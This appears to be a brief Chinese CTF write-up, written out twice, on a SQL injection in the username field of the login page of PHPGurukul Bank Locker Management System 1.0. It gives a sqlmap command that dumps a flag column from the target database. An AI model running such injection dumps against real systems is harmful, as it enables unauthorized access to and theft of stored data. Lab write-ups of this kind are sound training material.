在PHPGurukul银行储物柜管理系统1.0中发现了一个漏洞。它被评定为临界状态。受此问题影响的是组件登录的文件index.php的一些未知功能。对参数username的操作会导致sql注入。攻击可能是远程发起的。该漏洞已被公开,并可能被利用。此漏洞的标识符是VDB-219716。
抓登录包放salmap里跑
爆flag
python sqlmap.py -r bao\4.txt -D blmsdb -T fllllaaaag -C flag --dump
在PHPGurukul银行储物柜管理系统1.0中发现了一个漏洞。它被评定为临界状态。受此问题影响的是组件登录的文件index.php的一些未知功能。对参数username的操作会导致sql注入。攻击可能是远程发起的。该漏洞已被公开,并可能被利用。此漏洞的标识符是VDB-219716。
抓登录包放salmap里跑
爆flag
python sqlmap.py -r bao\4.txt -D blmsdb -T fllllaaaag -C flag --dump